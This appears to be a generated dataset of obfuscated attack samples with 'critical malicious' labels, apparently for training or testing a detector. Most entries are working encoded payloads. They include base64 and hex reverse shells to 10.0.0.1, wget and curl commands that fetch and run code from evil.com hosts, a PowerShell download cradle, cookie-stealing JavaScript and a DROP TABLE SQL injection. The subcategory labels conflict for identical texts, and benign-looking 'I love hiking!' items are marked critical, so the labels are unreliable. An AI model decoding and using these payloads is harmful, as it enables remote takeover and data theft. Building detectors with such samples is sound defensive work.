"hard_obfuscated_attacks_00414", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00415", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00416", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00417", "source": "hard_negatives", "source_license": "generated", "text": "[2022-05-09 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00418", "source": "hard_negatives", "source_license": "generated", "text": "[2023-02-28 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00419", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00420", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00421", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00422", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.bd83fcb0.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00423", "source": "hard_negatives", "source_license": "generated", "text": "var _0xb99a=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x0e6d[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00424", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00425", "source": "hard_negatives", "source_license": "generated", "text": "var _0xb69f=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x8364[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00426", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00427", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.f74b1db6.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00428", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00429", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00430", "source": "hard_negatives", "source_license": "generated", "text": "var _0x3374=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xd46c[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00431", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00432", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00433", "source": "hard_negatives", "source_license": "generated", "text": "var _0x2959=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x4f55[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00434", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00435", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00436", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00437", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.793c8418.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00438", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00439", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00440", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00441", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00442", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.2d165480.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00443", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.247438ba.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00444", "source": "hard_negatives", "source_license": "generated", "text": "[2022-02-08 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00445", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00446", "source": "hard_negatives", "source_license": "generated", "text": "var _0xde43=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xfda2[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00447", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00448", "source": "hard_negatives", "source_license": "generated", "text": "var _0xb0d7=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x5e53[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00449", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00450", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00451", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00452", "source": "hard_negatives", "source_license": "generated", "text": "var _0x660f=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x2f36[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00453", "source": "hard_negatives", "source_license": "generated", "text": "var _0xd982=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x0a2a[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00454", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00455", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00456", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00457", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.a2b1c29e.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00458", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.59a6ba66.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00459", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00460", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00461", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00462", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00463", "source": "hard_negatives", "source_license": "generated", "text": "var _0x6280=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x4b37[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00464", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00465", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00466", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.3a463709.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00467", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00468", "source": "hard_negatives", "source_license": "generated", "text": "[2021-09-24 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00469", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.c2594330.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": 